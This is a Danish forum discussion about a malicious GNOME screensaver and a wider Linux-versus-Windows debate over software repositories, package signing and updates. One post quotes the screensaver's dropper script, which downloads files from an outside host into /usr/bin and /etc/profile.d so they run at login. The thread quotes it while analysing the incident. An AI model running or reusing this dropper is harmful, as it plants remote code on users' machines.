mboost-dp1
GNOME
Windcape (45) skrev:Gæt hvad begge programmer har tilfældes? Ikke i dine default repos, men download fra deres respektive hjemmesider.
Du læste ikke mit første indlæg så..... Fy fy skamme.... :)
Der står:
E-mol (41) skrev:Alt hvad jeg har af custom og 3. parts-programmer kører igennem ppa. Altså, de bliver opdateret præcis som var de i repos; og alt hvad jeg skulle gøre for at gøre det, stod som den simpleste manual jeg bare skulle følge.
Godt så.. Jeg bruger også Dropbox, og her er en ppa til det:
https://launchpad.net/~nautilus-dropbox/+archive/p...
Så behøver du ikke være bange for opdateringerne ;)
Og hvad songbird angår, tja.. jeg bruger Muine selv, så slipper for mere pjat ;)
Men der er da vidst et daily-build ppa til songbird, ved ikke af andet.
Men hvis du går og legeer med tanken om at slippe for at opdaterer selv skal du bare søge:
"*programmets navn* ppa"
Så kommer du gerne godt i havn ;)
Nej? Udover at det ikke er uforventet måde at bruge systemet på.DanaKaZ (49) skrev:Er det anderledes i Windows med hensyn til de programmer?
Derudover tilbyder Windows digital signering af programmer (og dermed Installers).
Ligesom at man netop har udviklet anti-virus/spyware/malware programmer, da vi er nået til det punkt, hvor at stole på at brugeren ikke er dum mere, er urealistisk.
Jeg ser personligt ikke anti-virus som nødvendigt, men min far er ret glad for det, specielt med en lømme til min lillebror, som sikkert nemt kunne komme til at installere noget random software med malware i.
Hvis et system skal acceptere en brugerskare i alle aldre, så kan man slet ikke forvente at brugeren tænker sig om, overhovedet.
Det er fint, men sandsyneligheden for at Hr. Jensen besøger en så teknisk side som launchpad, for at køre en eller anden PPA ting er ret lille. (Jeg ved ikke engang hvad PPA er!, og kan ikke se hvorfor jeg skulle vide det),E-mol (51) skrev:Godt så.. Jeg bruger også Dropbox, og her er en ppa til det:
https://launchpad.net/~nautilus-dropbox/+archive/p...
Så behøver du ikke være bange for opdateringerne ;)
Derudover står der "untrusted PPA". Ordet "untrusted" er ikke positivt.
Hr Jensen kan godt jo, fordi det er så simpelt bare at gøre hvad der står.
og.....
Og uvidenhed om "Personal Package Archive", som det så fint hedde, er farligt som datamatiker; men også en god grund til at bære over med dig :)
Og her:
http://lmgtfy.com/?q=what+is+ppa
Tredje resultat er et svar til dig :)
Og untrusted ja.. Nu snakkede vi jo om opdateringer.. Men det er rigtigt; hvis man skal være trusted så kan vi ligeså godt opgive programmer man ikke selv skriver.
Jeg skal være ærlig og indrømme at jeg aldrig har læst den tekst der, og har aldrig gidet bruge tid på trusted og untrsted ppa'er, men det vil jeg da nok læse lidt om :)
EDIT:
Og fandeme så om jeg er blind :P
Længere nede på dropbox' download side til linux er der faktisk links til en ppa de selv styrer.. det er det der med at tænke ;)
og.....
Og uvidenhed om "Personal Package Archive", som det så fint hedde, er farligt som datamatiker; men også en god grund til at bære over med dig :)
Og her:
http://lmgtfy.com/?q=what+is+ppa
Tredje resultat er et svar til dig :)
Og untrusted ja.. Nu snakkede vi jo om opdateringer.. Men det er rigtigt; hvis man skal være trusted så kan vi ligeså godt opgive programmer man ikke selv skriver.
Jeg skal være ærlig og indrømme at jeg aldrig har læst den tekst der, og har aldrig gidet bruge tid på trusted og untrsted ppa'er, men det vil jeg da nok læse lidt om :)
EDIT:
Og fandeme så om jeg er blind :P
Længere nede på dropbox' download side til linux er der faktisk links til en ppa de selv styrer.. det er det der med at tænke ;)
skipperskip (34) skrev:
På min Ubuntu, opdateres ALLE programmerne på én gang. Jeg har ikke en masse programmer som dukker op konstant og spørger om det lige skal se efter om der er opdateringer. Disse programmer kører også typisk i baggrunden på Windows, for det er jo så vigtigt, at lede efter opdateringer til en program som der ikke er brug for nu. Led evt. når brugeren starter programmet, ikke konstant.
De søger angiveligt folk til at arbejde på et 3. parts opdaterings funktion til win8 så de har formentlig set lyset i at kunne tilbyde andre software huse muligheden for opdateringer autimatisk uden at de skulle inkludere egen opdaterings funktion.
Hubert (56) skrev:De søger angiveligt folk til at arbejde på et 3. parts opdaterings funktion til win8 så de har formentlig set lyset i at kunne tilbyde andre software huse muligheden for opdateringer autimatisk uden at de skulle inkludere egen opdaterings funktion.
Lækkert, håber for dem at det bliver til noget :)
#MYPLACEDK
jeg gentager lige mig selv igen igen og igen.
Er man alm. bruger er OpenS ikke et godt valg. Jeg går ud fra du ikke er en alm. bruger.
Altså de kunder jeg servicere er alm. brugere hvis ikke totalt nybegyndere og de fatter slet ikke hvad update er og derfor er der et stort problem. Og nej de har ikke alle sammen windows... der er desværre nogen der er faldet i god salgs teknik og købt en billig pc med linux på og er efter mit besøg blevet rigtig glade for deres PC'er som nu har windows. Fordi nu for de hjælp i hovede og røv.
Altså OpenS til nørder og superbruger og ikke til alm Brugere.
Nu behøver jeg vel ikke skrive det igen ?
jeg gentager lige mig selv igen igen og igen.
Er man alm. bruger er OpenS ikke et godt valg. Jeg går ud fra du ikke er en alm. bruger.
Altså de kunder jeg servicere er alm. brugere hvis ikke totalt nybegyndere og de fatter slet ikke hvad update er og derfor er der et stort problem. Og nej de har ikke alle sammen windows... der er desværre nogen der er faldet i god salgs teknik og købt en billig pc med linux på og er efter mit besøg blevet rigtig glade for deres PC'er som nu har windows. Fordi nu for de hjælp i hovede og røv.
Altså OpenS til nørder og superbruger og ikke til alm Brugere.
Nu behøver jeg vel ikke skrive det igen ?
Holy shit. Hvordan kan du, Lmao2008, konkludere, at open-source-software ikke opdaterer sig selv, men at closed-source software gør? Tag eksempler som Opera eller Skype som er closed-source-software. Opdaterer de sig selv, eller informerer de blot brugeren om at der er en ny version tilgængelig?
Det har jo ikke noget at gøre med, om det er open-source eller ej, men hvordan programmet er skrevet, og hvilket system programmørerne har valgt at tilpasse programmet til!
Nogle open-source-programmer opdaterer sig selv, og andre gør ikke. Nogle closed-source programmer opdaterer sig selv, andre gør ikke.
Det har jo ikke noget at gøre med, om det er open-source eller ej, men hvordan programmet er skrevet, og hvilket system programmørerne har valgt at tilpasse programmet til!
Nogle open-source-programmer opdaterer sig selv, og andre gør ikke. Nogle closed-source programmer opdaterer sig selv, andre gør ikke.
@ OP.
... Og dermed falder "many eyes" teorien fra hinanden...
(for dem der er mindre oplyste kan det oplyses [haha] at "many eyes" i bund og grund betyder at den slags ikke skulle ske, siden at der er mange folk der har mulighed for at se koden, og dermed mange folk der kan tage sig af den, og dermed skabe bedre og mere sikker software.)
... Og dermed falder "many eyes" teorien fra hinanden...
(for dem der er mindre oplyste kan det oplyses [haha] at "many eyes" i bund og grund betyder at den slags ikke skulle ske, siden at der er mange folk der har mulighed for at se koden, og dermed mange folk der kan tage sig af den, og dermed skabe bedre og mere sikker software.)
#62
Men hvis du læser tråden er første post jo. "hmm - den her kode ser skummel ud, er det virkelig en screensaver" - så du kan vel ikke benægte at de hjalp med at identificere problemet og afslørede hvordan malwaren virkede.
Men hvis du læser tråden er første post jo. "hmm - den her kode ser skummel ud, er det virkelig en screensaver" - så du kan vel ikke benægte at de hjalp med at identificere problemet og afslørede hvordan malwaren virkede.
Lmao2008 (59) skrev:jeg gentager lige mig selv igen igen og igen.
Det er der ingen grund til. Men du kan jo uddybe, eller bede mig uddybe.
Jeg kan tilføje at jeg har oplevet det omvendte oftere, altså at non-geeks synes Ubuntu er rarere end Windows. Så lad lige være med at konkludere en helt masse ud fra dine egne erfaringer.
Windcape (60) skrev:myplacedk er af den overbevisning af hvis man installere software som ikke er i et default repo, så er man superbruger.
Det var ihvertfald hans mening om at jeg ville installere Songbird på Ubuntu.
Jeg er af den overbevisning, at hvis et stykke software er for besværligt at installere (uanset OS), så er softwaren formentlig ikke modent nok, til at blive installeret af den bruger, som synes det er for besværligt.
Din formulering er din fortolkning.
Og hvis der ikke er en nem måde at installere Songbird på, så er det en usædvanlig situation. Min erfaring med open source er, at installationen er noget af det første der modner.
Tjahmyplacedk (65) skrev:Min erfaring med open source er, at installationen er noget af det første der modner.
https://www.dropbox.com/downloading?os=lnx
deb pakker er da også helt fint. Men lad os bare sige, at Linux versionen af dropbox installation er noget mere "nørdet" end Windows versionen.
Og nej, det er jo ikke Open Source, såååå ;-)
(Kom nu, noget prædiken om at dropbox er amoralsk, gogo)
#66
Nej, Dropbox er ikke mere nørdet i Linux i Windows, og det er ikke mere besværligt at installere.
De lægger op til at man skal gøre som i Windows, bare nemmere.
For dem som ikke er med: Man downloader deb-filen, åbner den, siger ja til at installerer den, venter et øjeblik, logger ud, logger ind igen, færdig.
Hvis man hellere vil bruge et repository (så opdateringer kommer automatisk osv.) står stierne lidt længere nede. De kunne godt gøre mere ud af at beskrive hvad man skal gøre med de stier. De interesserede kan undersøge sagen, resten kan bare bruge deb-filen direkte.
Nej, Dropbox er ikke mere nørdet i Linux i Windows, og det er ikke mere besværligt at installere.
De lægger op til at man skal gøre som i Windows, bare nemmere.
For dem som ikke er med: Man downloader deb-filen, åbner den, siger ja til at installerer den, venter et øjeblik, logger ud, logger ind igen, færdig.
Hvis man hellere vil bruge et repository (så opdateringer kommer automatisk osv.) står stierne lidt længere nede. De kunne godt gøre mere ud af at beskrive hvad man skal gøre med de stier. De interesserede kan undersøge sagen, resten kan bare bruge deb-filen direkte.
#66
At menneskerne bag drop-box, ikke tilmelder deres software til et closed-source repo, må stå for deres regning, ikke linux-folkene.
At der så til gengæld ikke er en funktion i linux* og dets .deb-pakker ikke har en mulighed for at ligge en sti til opgradering af programmet ind i systemet, så programmet er så en helt anden sag, og netop udviklernes ansvar - hvis folk da ellers synes det er noget værd.
*Linux fordi jeg ikke lige vidste hvad der ellers skal stå.
EDIT: At man så mener at det er sværere at installere et program ved hjælp af en .deb pakke er jeg fuldstændig uforstående overfor (Download, dobbeltklik, klik installer, klik luk.)
Hvis jeg har misforstået nogle folks holdninger vil jeg da gerne have det at vide.
At menneskerne bag drop-box, ikke tilmelder deres software til et closed-source repo, må stå for deres regning, ikke linux-folkene.
At der så til gengæld ikke er en funktion i linux* og dets .deb-pakker ikke har en mulighed for at ligge en sti til opgradering af programmet ind i systemet, så programmet er så en helt anden sag, og netop udviklernes ansvar - hvis folk da ellers synes det er noget værd.
*Linux fordi jeg ikke lige vidste hvad der ellers skal stå.
EDIT: At man så mener at det er sværere at installere et program ved hjælp af en .deb pakke er jeg fuldstændig uforstående overfor (Download, dobbeltklik, klik installer, klik luk.)
Hvis jeg har misforstået nogle folks holdninger vil jeg da gerne have det at vide.
Det er der nok en del der synes. Man mange er mener desværre at man "bare skal bruge repos", eller "gider ikke support closed source".johanmw (69) skrev:hvis folk da ellers synes det er noget værd.
Ligegyldigt om det hjælper brugerne eller ej.
Man må godt generalisere, der er vist ikke FSF fanatikere heromkring.johanmw (69) skrev:Linux fordi jeg ikke lige vidste hvad der ellers skal stå.
Windcape (68) skrev:Mig bekendt pakker man altså ikke en .deb fil ud ;-) Det svarer til en OneClick installer.
Ingen snakker om at pakke en deb-fil ud. Når jeg siger "åbne" den, mener jeg fx. at dobbelt-klikke på den, så den bliver åbnet i et program som kan håndtere deb-filer.
Ligesom når man åbner et word-dokument, you know. Jeg overvejede også "starte" og "aktivere".
Windcape (74) skrev:FSF folk bliver sure hvis du generalisere om Linux som platform.
De vil have du skal kalde det GNU/Linux.
apropo generalisere ...
Lmao2008 (59) skrev:#MYPLACEDK
jeg gentager lige mig selv igen igen og igen.
Altså OpenS til nørder og superbruger og ikke til alm Brugere.
Nu behøver jeg vel ikke skrive det igen ?
Windows , OS og/eller 3'dieparts software opdaterer ikke sig selv automatisk, det ved vi, så what's your point?
Jeg kan intet se i dine argumenter, der understøtter at OS skulle være ringere for en alm. bruger end Windows?
Faktisk, som også er nævne af andre, kommer f.eks. Ubuntu med éen opdate notifikation for alle programmer incl. styresystem, modsat Windows, der kommer med separate for alle programmer?
Så, indtil du kan argumentere overbevisende for dine meninger, kommer du nok til at gentage dig selv igen og igen. ;-)
Det bliver spændende at se om dette resulterer i at nogen finder en løsning der kan forhindre at dette gentager sig i fremtiden. Det ville give god mening at man kunne køre en screensaver i en sandkasse, hvor den ingen skade kan gøre.
Engang for ca. 9 år siden så jeg et tilfælde hvor en deffekt grafikkortsdriver betød at alle pauseskærme, som anvendte opengl, gik ned. Men det havde så det resultat, at hele programmet gik ned og der bare blev låst op for skærmen, så maskinen uden videre kunne benyttes uden password.
Dette er selvfølgelig et sikkerhedsproblem, og det er mig bekendt blevet fixet for længe siden. I dag kører de to dele mig bekendt som to separate processer, så hvis programmet der renderer grafikken gik ned, ville der stadgivæk være låst med et password.
Og for ny at komme windows fanboys i forkøbet så lad mig lige nævne at ovenstående problem lige så vel kunne have forekommet på Windows. For ca. en måned siden var en person jeg kender udsat for et lignende problem med Windows, og nogen smuttede så lige forbi hans computer og sendte en email fra hans account til en maillingliste med hundredevis af personer.
Det kan sagtens lade sig gøre at begrænse sådan en screensavers rettigheder. Der er ingen grund til at en screensaver skal have adgang til at ændre mine filer. Nogle screensavere vil gerne lave fancy effekter med mit skærmbillede, det er da også helt fint, men det skal gøres med et passende framework hvor screensaveren ikke har direkte adgang til at aflæse hvad der er på min skærm. I stedet for får den et billede fra den priviligerede del af screensaveren, som kan konfigureres til enten at levere mit faktiske skærmbillede, eller en billedfil, jeg selv har angivet.
Der er heller ingen grund til at en screensaver skal have ubegrænset adgang til netværket. Der findes nok nogle, der gerne vil downloade opdaterede oplysninger fra nettet. Men så giv en mulighed for at angive en URL der skal downloades, og så får den adgang til indholdet af den og intet andet.
Det er selvfølgelig ingen garanti imod brugere der downloader og kører et program for nettet i den tro at det er sådan man installerer en ny screensaver. Men det kunne da i hvert fald hjælpe et repository af screensavers. Sådan et repository kan umuligt checke sikkerheden i alle screensavers, men de kunne have noget der automatisk checker, at de alle blot vil køre i en sandkasse.
Lad os se hvilket OS der først implementerer sådan en sandkasse. Og lad os se hvad der bliver det næste mål for malware.
Engang for ca. 9 år siden så jeg et tilfælde hvor en deffekt grafikkortsdriver betød at alle pauseskærme, som anvendte opengl, gik ned. Men det havde så det resultat, at hele programmet gik ned og der bare blev låst op for skærmen, så maskinen uden videre kunne benyttes uden password.
Dette er selvfølgelig et sikkerhedsproblem, og det er mig bekendt blevet fixet for længe siden. I dag kører de to dele mig bekendt som to separate processer, så hvis programmet der renderer grafikken gik ned, ville der stadgivæk være låst med et password.
Og for ny at komme windows fanboys i forkøbet så lad mig lige nævne at ovenstående problem lige så vel kunne have forekommet på Windows. For ca. en måned siden var en person jeg kender udsat for et lignende problem med Windows, og nogen smuttede så lige forbi hans computer og sendte en email fra hans account til en maillingliste med hundredevis af personer.
Det kan sagtens lade sig gøre at begrænse sådan en screensavers rettigheder. Der er ingen grund til at en screensaver skal have adgang til at ændre mine filer. Nogle screensavere vil gerne lave fancy effekter med mit skærmbillede, det er da også helt fint, men det skal gøres med et passende framework hvor screensaveren ikke har direkte adgang til at aflæse hvad der er på min skærm. I stedet for får den et billede fra den priviligerede del af screensaveren, som kan konfigureres til enten at levere mit faktiske skærmbillede, eller en billedfil, jeg selv har angivet.
Der er heller ingen grund til at en screensaver skal have ubegrænset adgang til netværket. Der findes nok nogle, der gerne vil downloade opdaterede oplysninger fra nettet. Men så giv en mulighed for at angive en URL der skal downloades, og så får den adgang til indholdet af den og intet andet.
Det er selvfølgelig ingen garanti imod brugere der downloader og kører et program for nettet i den tro at det er sådan man installerer en ny screensaver. Men det kunne da i hvert fald hjælpe et repository af screensavers. Sådan et repository kan umuligt checke sikkerheden i alle screensavers, men de kunne have noget der automatisk checker, at de alle blot vil køre i en sandkasse.
Lad os se hvilket OS der først implementerer sådan en sandkasse. Og lad os se hvad der bliver det næste mål for malware.
Det script kan intet gøre med mindre det kører som root. Og de to filer det prøver at hente er faktisk ikke mere tilgængelige.skipperskip (29) skrev:#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
Teknisk set har Windows allerede implementeret sådan en sandkasse. Den virker dog ikke hvis man slår UAC fra ;-)kasperd (78) skrev:Lad os se hvilket OS der først implementerer sådan en sandkasse. Og lad os se hvad der bliver det næste mål for malware.
Men screensavers var en utrolig populær måde at sprede malware i 90erne.
De fleste anti-virus programmer er ret opmærksom på dette. Så mangler vi bare mere fokus på anti-virus til Linux. Der er ngle få produkter, men de er ret ukendte.
Jeg bliver desværre nød til at rette de mange fejl Windcape er kommet med:
Du må fortælle os om begrænsningerne.
De repos jeg abonnere på, giver mig adgang til lidt over 30.000 software pakker ... opdateringen af listen tager 1.5 sekunder, det tager ikke lang tid at sende 30 http HEAD requests og kikke på tidsstemplet.
Henter jeg software er min 8Mbit/s internet linie flaske halsen ... ikke alle repos er så hurtige, men de officielle er generelt forbavsende hurtige.
Til sammenligning bruger Steam (som jeg rigtigt glad for på min spille PC) noget der ligner 10 sekunder på at starte op og finde ud af de 10 spil ikke skal opdateres .... login processen er det som ser ud til at tage længst tid.
Det er 20.000 applikationer pr. sekund på Ubuntu og 1 applikation i sekundet på min spille maskine.
Windows update tager endnu længere tid. Her skal der checkes om min licens er gyldig og andre unødvendige ting (for brugeren, men ikke for Microsofts forretningsmodel).
Kan du sætte antal på software pakker, hvor man vil opleve begrænsningerne du snakker om, med repos systemet?
De eksempler du kommer med er i deres eget repos.
Er en Oracle database komplekst nok?
Brug følgende repos:
deb http://oss.oracle.com/debian unstable main non-free
Hent Oracles PGP nøgle, så du er sikker på den software du henter fra Oracle er digitalt underskrevet af Oracle
# wget http://oss.oracle.com/el4/RPM-GPG-KEY-oracle -O- | sudo apt-key add -
Updatere din software oversigt
# apt-get update
Installere Oracle-XE.
# apt-get install oracle-xe
Hvad er det pænere end?
Det er ikke pænt at opdateringer er afhængt at om din browser virker ... er det ikke den, de fleste angreb er rettet imod?
Det er mange år siden det skete ... se fx ovenstående eksempel fra Oracle.
På Windows, hvem stoler du på når du stoler på signeret software ... eller spurgt på en anden måde ... hvilke led/producenter kan lave fejl?
Læs evt. http://www.theregister.co.uk/2008/08/16/certified_... og nej, det er ikke første gang.
Songbird ligger i getdeb, se http://www.getdeb.net/app/Songbird ... dvs. du tilføjer følgende til repos:
deb http://archive.getdeb.net/ubuntu karmic-getdeb apps
Og importere PGP nøglen
# wget -q -O- http://archive.getdeb.net/getdeb-archive.key | sudo apt-key add -
Herefter kan songbird installer/upgradere som et almindelig program i Ubuntu Software Center.
Dropbox, tilføj følgende til repos:
deb http://linux.dropbox.com/ubuntu karmic main
Deres PGP nøgle ligger hos MIT:
# sudo gpg --keyserver pgp.mit.edu --recv-keys 3565780E
Herefter kan du installere/opgradere dropbox i Ubuntu Software Center.
Du har endnu ikke fortalt hvilke programmer du ser ... udover at noget software ikke er repos.
Debian har brugt PGP i længere tid.
Redhats yum/up2date har brugt MD5 i længere tid.
Hermed bliver programmer, libraries, kildetekst, scripts, konfigurationsfiler og datafiler signeret ... modsat Windows der kun signere programmer og libraries.
Forklar mig hvorfor man vedligeholder et system til at genkende fortidens/nutidens og fremtidens trusler ... når man helt præsis ved hvilke programmer man kører og disse nu om dage er digital underskrevet, dvs. man ved hvis der er rettet i dem.
Hvorfor ikke vedligeholde det modsatte ... nemlig en liste over programmer der er tilladt?
Jeg har virkelig aldrig fattet antivirus branchen, andet af de af en eller anden mærkelig grund tjener kassen på at lave en signatur database over trusler, istedet for at lave det modsatte.
Windows NT 4.0 og frem understøttede en positiv liste over godkende programmer.
De eksempler du har nævnt har haft deres eget repos.
Du må argumentere for hvorfor det er mere brugervenligt brugerne selv skal opdatere deres software og hver gang huske at checke signaturen.
Repos understøtter fint closed source ... Oracle i ovenstående er et fint eksempel ... det kræver at Oracle sætter lidt katalog struktur af på deres webserver.
Hvilke ting på http://www.fsf.org/ er du imod?
UNIX har chroot fra 1982, som er en simpel sandbox af filsystemet, eller retter et program der startes får en falsk pegepind til roden af filsystemet.
Antivirus programmerne scannede ikke i starten .scr filer, da man pga. performance kun scannede .exe og .dll ... ILOVEYOU virusen udnyttede dette på det "groveste" via .vbs .
Windcape skrev:
Hvis Linux bare skulle opnå en brugerskare på samme niveau som OSX, så er vi allerede ude på det punkt hvor officielle repos bare ikke er nok.
At forvente at f.eks. screensavers, custom themes, osv. er i default repos er komplet urealistisk.
Der mangles virkelig perspektiv hvis folk tror at repos altid vil være nok.
Du må fortælle os om begrænsningerne.
De repos jeg abonnere på, giver mig adgang til lidt over 30.000 software pakker ... opdateringen af listen tager 1.5 sekunder, det tager ikke lang tid at sende 30 http HEAD requests og kikke på tidsstemplet.
Henter jeg software er min 8Mbit/s internet linie flaske halsen ... ikke alle repos er så hurtige, men de officielle er generelt forbavsende hurtige.
Til sammenligning bruger Steam (som jeg rigtigt glad for på min spille PC) noget der ligner 10 sekunder på at starte op og finde ud af de 10 spil ikke skal opdateres .... login processen er det som ser ud til at tage længst tid.
Det er 20.000 applikationer pr. sekund på Ubuntu og 1 applikation i sekundet på min spille maskine.
Windows update tager endnu længere tid. Her skal der checkes om min licens er gyldig og andre unødvendige ting (for brugeren, men ikke for Microsofts forretningsmodel).
Windcape skrev:
Der er alt for meget niche software til Windows, til at det ville være en brugbar løsning.
Allerede på Linux har jeg fundet software som ikke er i repos.
Kan du sætte antal på software pakker, hvor man vil opleve begrænsningerne du snakker om, med repos systemet?
De eksempler du kommer med er i deres eget repos.
Windcape skrev:
Prøv også at overveje at en App Store / Package Manager ikke er den optimale løsning i 100% af alle tilfælde. Du tænker igen kun simple tilfælde, til relativt standard userland software.
Prøv at indregne mere komplicere ting.
Er en Oracle database komplekst nok?
Brug følgende repos:
deb http://oss.oracle.com/debian unstable main non-free
Hent Oracles PGP nøgle, så du er sikker på den software du henter fra Oracle er digitalt underskrevet af Oracle
# wget http://oss.oracle.com/el4/RPM-GPG-KEY-oracle -O- | sudo apt-key add -
Updatere din software oversigt
# apt-get update
Installere Oracle-XE.
# apt-get install oracle-xe
Windcape skrev:
Og derudover synes jeg at mine opdateringer på Windows 7 er noget "pænere" udført, i forhold til hvordan mit interface fortæller mig at der er opdateringer, hvad der skal opdateres, og så videre.
Hvad er det pænere end?
Det er ikke pænt at opdateringer er afhængt at om din browser virker ... er det ikke den, de fleste angreb er rettet imod?
Windcape skrev:
Og når vi nu snakker software. Hvornår tager Linux sig sammen og indføre signering af software i meta-data, i stedet for at bede folk checke MD5 hashes manuelt ? :p
Det er mange år siden det skete ... se fx ovenstående eksempel fra Oracle.
På Windows, hvem stoler du på når du stoler på signeret software ... eller spurgt på en anden måde ... hvilke led/producenter kan lave fejl?
Læs evt. http://www.theregister.co.uk/2008/08/16/certified_... og nej, det er ikke første gang.
Windcape skrev:
Songbird og Dropbox er 2 programmer som jeg finder utrolig gode, og specielt Dropbox ret rigtigt for en person som mig, der ejer mere end én computer.
Gæt hvad begge programmer har tilfældes? Ikke i dine default repos, men download fra deres respektive hjemmesider.
Det er blot få eksempler på hvad der med tiden vil blive langt større. At ryste på hovedet, og nægte at diskuttere en løsning i dag, er så utrolig dumt som det kan blive.
Songbird ligger i getdeb, se http://www.getdeb.net/app/Songbird ... dvs. du tilføjer følgende til repos:
deb http://archive.getdeb.net/ubuntu karmic-getdeb apps
Og importere PGP nøglen
# wget -q -O- http://archive.getdeb.net/getdeb-archive.key | sudo apt-key add -
Herefter kan songbird installer/upgradere som et almindelig program i Ubuntu Software Center.
Dropbox, tilføj følgende til repos:
deb http://linux.dropbox.com/ubuntu karmic main
Deres PGP nøgle ligger hos MIT:
# sudo gpg --keyserver pgp.mit.edu --recv-keys 3565780E
Herefter kan du installere/opgradere dropbox i Ubuntu Software Center.
Du har endnu ikke fortalt hvilke programmer du ser ... udover at noget software ikke er repos.
Windcape skrev:
Derudover tilbyder Windows digital signering af programmer (og dermed Installers).
Debian har brugt PGP i længere tid.
Redhats yum/up2date har brugt MD5 i længere tid.
Hermed bliver programmer, libraries, kildetekst, scripts, konfigurationsfiler og datafiler signeret ... modsat Windows der kun signere programmer og libraries.
Windcape skrev:
Ligesom at man netop har udviklet anti-virus/spyware/malware programmer, da vi er nået til det punkt, hvor at stole på at brugeren ikke er dum mere, er urealistisk.
Jeg ser personligt ikke anti-virus som nødvendigt, men min far er ret glad for det, specielt med en lømme til min lillebror, som sikkert nemt kunne komme til at installere noget random software med malware i.
Forklar mig hvorfor man vedligeholder et system til at genkende fortidens/nutidens og fremtidens trusler ... når man helt præsis ved hvilke programmer man kører og disse nu om dage er digital underskrevet, dvs. man ved hvis der er rettet i dem.
Hvorfor ikke vedligeholde det modsatte ... nemlig en liste over programmer der er tilladt?
Jeg har virkelig aldrig fattet antivirus branchen, andet af de af en eller anden mærkelig grund tjener kassen på at lave en signatur database over trusler, istedet for at lave det modsatte.
Windows NT 4.0 og frem understøttede en positiv liste over godkende programmer.
Windcape skrev:
Det er fint, men sandsyneligheden for at Hr. Jensen besøger en så teknisk side som launchpad, for at køre en eller anden PPA ting er ret lille. (Jeg ved ikke engang hvad PPA er!, og kan ikke se hvorfor jeg skulle vide det),
De eksempler du har nævnt har haft deres eget repos.
Du må argumentere for hvorfor det er mere brugervenligt brugerne selv skal opdatere deres software og hver gang huske at checke signaturen.
Windcape skrev:
Det er der nok en del der synes. Man mange er mener desværre at man "bare skal bruge repos", eller "gider ikke support closed source".
Repos understøtter fint closed source ... Oracle i ovenstående er et fint eksempel ... det kræver at Oracle sætter lidt katalog struktur af på deres webserver.
Windcape skrev:
Det er software verdens svar på Jehovas vidner.
Hvilke ting på http://www.fsf.org/ er du imod?
Windcape skrev:
Teknisk set har Windows allerede implementeret sådan en sandkasse. Den virker dog ikke hvis man slår UAC fra ;-)
UNIX har chroot fra 1982, som er en simpel sandbox af filsystemet, eller retter et program der startes får en falsk pegepind til roden af filsystemet.
Windcape skrev:
Men screensavers var en utrolig populær måde at sprede malware i 90erne.
De fleste anti-virus programmer er ret opmærksom på dette. Så mangler vi bare mere fokus på anti-virus til Linux. Der er ngle få produkter, men de er ret ukendte.
Antivirus programmerne scannede ikke i starten .scr filer, da man pga. performance kun scannede .exe og .dll ... ILOVEYOU virusen udnyttede dette på det "groveste" via .vbs .
Windcape (81) skrev:Omskriv overstående post uden at bruge nogen som helst form for terminal kommandoer/værktøjer. Kun grafiske brugervenlige værktøjer er tilladt.
Windcape, hvad er din pointe? Som jeg læser dine indlæg kommer du med masser af kritik, uden at have sat dig ind i emnet.
Hvad er nemmest?
At beskrive en GUI eller kommandoer? Skal jeg bruge skærmbilleder, eller måske lave en videofilm?
Kan min beskrivelse af en GUI oversættes til andre sprog, hvor detaileret skal den skrives for alle forstår den?
Et eksempel, songbird.
Vi skal have den digitale PGP nøgle ... gå til http://archive.getdeb.net/getdeb-archive.key i firefox og vælg ok:
Applications->Internet->Firefox web browser.
I adresse feltet tast: http://archive.getdeb.net/getdeb-archive.key
Herefter åbnet et nyt vindue der hedder opening getdeb-archive.key hvor firefox forslår nøglen skal åbnes med "import key", tryk ok, og nøglen er importeret.
Vi skal installere songbird:
Installere songbird (det er nu en standard applikation, og installere og updateres som alle andre applikationer):
Applications->Ubuntu Software Center
Ved kikkerten taster du songbird, vælg songbird og tryk på højre pilen. På næste skærmbilled trykker du på install.
Songbird er nu installeret.
clysel (82) skrev:
Vi skal have den digitale PGP nøgle
Jeg glemte at beskrive hvordan repos tilføjes:
System->Administration->Software Sources.
Vælg fanebladet "Other software", tryk add, skriv "deb http://archive.getdeb.net/ubuntu karmic-getdeb apps" og ok. Tryk Close og til spørgsmålet om at reloade repos data, tryk reload.
@clysel
Tag dig ikke af Windcape. Han kan ikke gøre for det.
Når ens primære kompetencer er MS basserede, vil man ubevidst overbevise sig selv om, at alt andet er ubrugeligt. Det er helt unugåligt.
Tag dig ikke af Windcape. Han kan ikke gøre for det.
Når ens primære kompetencer er MS basserede, vil man ubevidst overbevise sig selv om, at alt andet er ubrugeligt. Det er helt unugåligt.
Windcape (84) skrev:Og så kigger vi på de 2 overstående poster, og sammenligner med en Windows Installer der kræver 2-3 klik med musen, uden rent faktisk at læse hvad der står på skærmen.
Hvis du ikke kan se pointen endnu, så tror jeg aldrig du kommer til det.
Du har ikke lavet det samme:
1) Jeg bruger 11 klik på at installere songbird på Windows 7 og ikke 2-3 som du beskriver, se sidste afsnit. På Ubuntu tog dette 8 klik.
2) Af software skal jeg hente 75% mere da vi ikke kan bruge shared libraries. Hvor mange identiske .DDL filer har du liggende? Songbird leverede fx mozcrt19.dll og et helt lib, gst-plugins og xulrunner katalog med standard libraries, der til sammen fylder 50MB. Hele songbird program kataloget fylder 65MB.
3) Opdateringer af libraries er afhængigt af songbird, og kan ikke opdateres automatisk uden songbird folkene skal blandes ind i det.
4) Hvad er sikkerheden i forbindelse med songbirds auto opdatering? Som bruger har jeg ingen garanti for nogen sikkerhed er implementeret i forbindelse med opdateringer ... kik på Symantec som et skræk eksempel http://seclists.org/bugtraq/2001/Oct/39
5) Du har tidligere nævnt at filer har en digital signatur, dette er kun tilfælde med songbirds installer, men ingen af de installeret filer har dette.
6) Hvad skal jeg bruge en digital signatur til? I songbirds tilfælde var havde Versign underskrevet "PETI Inc." offentlige nøgle. Hvem/hvad er "PETI Inc."?
7) Er der et automatisk system til opdatering, er det typisk kun designet til den ene applikation (hvilket er tilfælde med songbird), eller i steams tilfælde 2000 spil. Ellers skal brugeren selv ud og hente en ny installere og installere den nye version forfra.
Jeg har i de to sidste indlæg, beskrevet hvorfor GUIer er noget rod ... det er krævende at beskrive selv simple ting ... hvis man ikke nøjes med at beskrive det som "der kræver 2-3 klik med musen".
Tager jeg songbird som eksempel på Windows 7:
1) Start (som ikke hedder start men som er et rundt icon med et flag og nej det er ikke det runde e :) ) ->All programs->Internet explorer
2) Indtast getsongbird.com/download
3) Tryk på Windows Download (hvor er Windows 7 download knappen?)
